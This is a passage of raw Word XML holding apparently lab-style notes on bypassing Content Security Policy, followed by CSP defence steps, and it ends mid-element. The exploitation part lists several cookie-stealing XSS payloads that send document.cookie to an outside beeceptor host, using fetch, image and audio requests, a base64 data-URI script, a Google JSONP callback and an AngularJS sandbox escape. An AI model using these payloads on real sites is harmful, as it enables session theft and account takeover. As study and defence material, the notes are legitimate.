    <w:p w14:paraId="2E51B622" w14:textId="7EF7B054" w:rsidR="00CA0383" w:rsidRDefault="00CA0383" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>bypassed if website does not have strict settings</w:t>
      </w:r>
      <w:r w:rsidR="00CD1E8B">
        <w:t xml:space="preserve"> for directives such as image-src and media-src</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F347F72" w14:textId="05633DD0" w:rsidR="00CD1E8B" w:rsidRDefault="00CD1E8B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. if XHR requests are blocked but images can be loaded from any location, abuse JS script with a crafted URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B470C75" w14:textId="26DF87B6" w:rsidR="00CD1E8B" w:rsidRDefault="00CD1E8B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD1E8B">
        <w:lastRenderedPageBreak/>
        <w:t>&lt;script&gt;(new Image()).src = `https://example.com/${encodeURIComponent(document.cookie)}`&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6866099C" w14:textId="54BED5D8" w:rsidR="00CD1E8B" w:rsidRDefault="00CD1E8B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381EA898" w14:textId="4B3F90EE" w:rsidR="00E55CCB" w:rsidRDefault="00E55CCB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CSP Evaluator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A7CAEF" w14:textId="52845FC2" w:rsidR="00D8133E" w:rsidRDefault="00D8133E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00D8133E">
        <w:t>https://book.hacktricks.xyz/pentesting-web/content-security-policy-csp-bypass#unsafe-inline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB72454" w14:textId="50BDA2F7" w:rsidR="00CD1E8B" w:rsidRDefault="00CD1E8B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>beeceptor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1621AC2F" w14:textId="74E2B14C" w:rsidR="00CD1E8B" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId156" w:history="1">
        <w:r w:rsidR="00E55CCB" w:rsidRPr="00342DAA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cybernullius.free.beeceptor.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31FC94F3" w14:textId="09519F60" w:rsidR="00E55CCB" w:rsidRDefault="00E55CCB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>detection of default-src ‘unsafe-inline’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5BE125" w14:textId="74B3285A" w:rsidR="00E55CCB" w:rsidRDefault="00E55CCB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">inject </w:t>
      </w:r>
      <w:r w:rsidRPr="00E55CCB">
        <w:t>&lt;script&gt;fetch(`</w:t>
      </w:r>
      <w:hyperlink r:id="rId157" w:history="1">
        <w:r w:rsidRPr="00342DAA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cybernullius.free.beeceptor.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E55CCB">
        <w:t>/${document.cookie}`)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181FF072" w14:textId="2BBCD8A3" w:rsidR="00262516" w:rsidRDefault="00262516" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>detection of script-src: data-finding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CFB71E" w14:textId="6AB03B50" w:rsidR="00262516" w:rsidRDefault="00262516" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00262516">
        <w:t>echo -n 'fetch(`https://</w:t>
      </w:r>
      <w:r>
        <w:t>cybernullius</w:t>
      </w:r>
      <w:r w:rsidRPr="00262516">
        <w:t>.free.beeceptor.com/${document.cookie}`)' | base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E063E0" w14:textId="48B6E2E1" w:rsidR="00D8133E" w:rsidRDefault="00D8133E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>copy output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2AA6B5" w14:textId="76DC3F8A" w:rsidR="00D8133E" w:rsidRDefault="00D8133E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00D8133E">
        <w:t>&lt;script src="data:;base64,ZmV0Y2goYGh0dHBzOi8vc3Ryb2tlLmZyZWUuYmVlY2VwdG9yLmNvbS8ke2RvY3VtZW50LmNvb2tpZX1gKQ=="&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7E8019" w14:textId="7ED72D38" w:rsidR="00D8133E" w:rsidRDefault="00D8133E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>detection of script-src ‘unsafe-inline’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180B60FD" w14:textId="767CD7DA" w:rsidR="00D8133E" w:rsidRDefault="00D8133E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>change alert tage into image tag and cookie request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E71CA98" w14:textId="5D44EED6" w:rsidR="00D8133E" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId158" w:history="1">
        <w:r w:rsidR="00D8133E" w:rsidRPr="00342DAA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://pentest-tools.com/blog/xss-attacks-practical-scenarios/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="06B9E370" w14:textId="14D99E1E" w:rsidR="00D8133E" w:rsidRDefault="00D8133E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00D8133E">
        <w:t>"/&gt;&lt;script&gt;new Image().src="https://</w:t>
      </w:r>
      <w:r w:rsidR="00034CCE">
        <w:t>cybernullius</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8133E">
        <w:t>7.free.beeceptor.com/" + document.cookie;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F19F207" w14:textId="06BFC1A2" w:rsidR="00D8133E" w:rsidRDefault="00D8133E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>detection of short nonce value and missing base-uri</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05742126" w14:textId="55CF9461" w:rsidR="00D8133E" w:rsidRDefault="00D8133E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>craft a script as long as the nonce value is included</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177C2E93" w14:textId="3388F52A" w:rsidR="00D8133E" w:rsidRDefault="00D8133E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283228A5" w14:textId="279612CE" w:rsidR="00D8133E" w:rsidRDefault="00D8133E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00D8133E">
        <w:t>&lt;script nonce="abcdef"&gt;alert(1);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435C38B6" w14:textId="657031D3" w:rsidR="00D8133E" w:rsidRDefault="00D8133E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C34481E" w14:textId="672159DE" w:rsidR="00D8133E" w:rsidRDefault="00D8133E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00D8133E">
        <w:t>&lt;script nonce="abcdef"&gt;document.location='https://</w:t>
      </w:r>
      <w:r w:rsidR="00034CCE">
        <w:t>cybernullius</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8133E">
        <w:t>7.free.beeceptor.com/?c='+document.cookie;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6AD83F" w14:textId="72A80E34" w:rsidR="00D8133E" w:rsidRDefault="00D8133E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>detection of subdomain allowance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3435E37E" w14:textId="0F47C2BF" w:rsidR="00D8133E" w:rsidRDefault="00D8133E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. .google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F06C4EB" w14:textId="21E08BBE" w:rsidR="00D8133E" w:rsidRDefault="00D8133E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use google JSON endpoint to bypass and execute code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5DAD00" w14:textId="6002E13E" w:rsidR="00D8133E" w:rsidRDefault="00D8133E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>pull from JSONBee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6987E2A2" w14:textId="619D9DDD" w:rsidR="00034CCE" w:rsidRDefault="00034CCE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>PoC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76082B14" w14:textId="76BE03E5" w:rsidR="00D8133E" w:rsidRDefault="00034CCE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00034CCE">
        <w:t>"&gt;&lt;script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A85582" w14:textId="6C1502E6" w:rsidR="00034CCE" w:rsidRDefault="00034CCE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1D17C1" w14:textId="6CDDB913" w:rsidR="00034CCE" w:rsidRDefault="00034CCE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00034CCE">
        <w:t>&lt;script src="//accounts.google.com/o/oauth2/revoke?callback=eval(document.location='https://</w:t>
      </w:r>
      <w:r>
        <w:t>cybernullius</w:t>
      </w:r>
      <w:r w:rsidRPr="00034CCE">
        <w:t>7.free.beeceptor.com/'.concat(document.cookie))"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1111F0A9" w14:textId="536C4382" w:rsidR="00034CCE" w:rsidRDefault="00034CCE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>detection of server service and CDNs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AF8D66" w14:textId="77777777" w:rsidR="00034CCE" w:rsidRDefault="00034CCE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.3/prototype.min.js" integrity="sha512-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>C4LuwXQtQOF1iTRy3zwClYLsLgFLlG8nCV5dCxDjPcWsyFelQXzi3efHRjptsOzbHwwnXC3ZU+sWUh1gmxaTBA==" crossorigin="anonymous"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D050A8" w14:textId="77777777" w:rsidR="00034CCE" w:rsidRDefault="00034CCE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.8.2/angular.min.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16791D47" w14:textId="7B66A8D7" w:rsidR="00034CCE" w:rsidRDefault="00034CCE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;div ng-app ng-csp&gt;{{$on.curry.call().document.location='https://cybernullius.free.beeceptor.com/' + $on.curry.call().document.cookie}}&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C683F69" w14:textId="1FA91206" w:rsidR="00034CCE" w:rsidRDefault="00034CCE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>detection of audio src</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3425314B" w14:textId="289E6A74" w:rsidR="00034CCE" w:rsidRDefault="00546187" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00546187">
        <w:t>&lt;script src="/'; new Audio('https://</w:t>
      </w:r>
      <w:r>
        <w:t>cybernullius</w:t>
      </w:r>
      <w:r w:rsidRPr="00546187">
        <w:t>.free.beeceptor.com/' + document.cookie); '"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60669990" w14:textId="6FDDA567" w:rsidR="00546187" w:rsidRDefault="00546187" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Defence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251F5B14" w14:textId="177FF90B" w:rsidR="00546187" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId159" w:history="1">
        <w:r w:rsidR="00546187" w:rsidRPr="00342DAA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://report-uri.com/home/generate</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6A838C5D" w14:textId="23ACD5FD" w:rsidR="00546187" w:rsidRDefault="00546187" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>create CSP that only allows scripts used by website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389A12B1" w14:textId="682A428F" w:rsidR="00546187" w:rsidRDefault="00546187" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>script-src</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38486442" w14:textId="1FC51BC8" w:rsidR="00546187" w:rsidRDefault="00546187" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>self for all options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C781A6" w14:textId="5FA81FCB" w:rsidR="00546187" w:rsidRDefault="00546187" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>include IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD89CBD" w14:textId="51A1132F" w:rsidR="00546187" w:rsidRDefault="00546187" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>nonce value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B69CDB7" w14:textId="07B126F5" w:rsidR="00546187" w:rsidRDefault="00922412" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>add nonce value to URL in above default and script sources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439A6C3B" w14:textId="32303855" w:rsidR="00922412" w:rsidRDefault="00922412" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="00342DAA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://&lt;ip</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>&gt; ‘nonce-#####’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEDD89C" w14:textId="48E8AD74" w:rsidR="00922412" w:rsidRDefault="000C398E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>scipt tag allowed, inline JS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21532996" w14:textId="6F02D3DE" w:rsidR="000C398E" w:rsidRDefault="000C398E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">generate SHA256 value using </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A86D226" w14:textId="2AFC4F9F" w:rsidR="000C398E" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId160" w:history="1">
        <w:r w:rsidR="000C398E" w:rsidRPr="00342DAA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://report-uri.com/home/hash</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6A5E4CDE" w14:textId="73BEB887" w:rsidR="000C398E" w:rsidRDefault="000C398E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>copy paste script into generator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BA0156" w14:textId="27921D64" w:rsidR="000C398E" w:rsidRDefault="000C398E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="000C398E">
        <w:t>console.log("__defend-3_REAL=true")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7E53C8" w14:textId="0489C42A" w:rsidR="000C398E" w:rsidRDefault="000C398E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">output - </w:t>
      </w:r>
      <w:r w:rsidRPr="000C398E">
        <w:t>'sha256-msFFk2PJ3th+BLkXCEmbzm944IJKWP3bxeY70tH2eLY='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34372792" w14:textId="3BD89B5C" w:rsidR="000C398E" w:rsidRDefault="000C398E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;ip&gt;:&lt;port&gt; ‘hash’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCCF927" w14:textId="172DA196" w:rsidR="000C398E" w:rsidRDefault="000C398E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
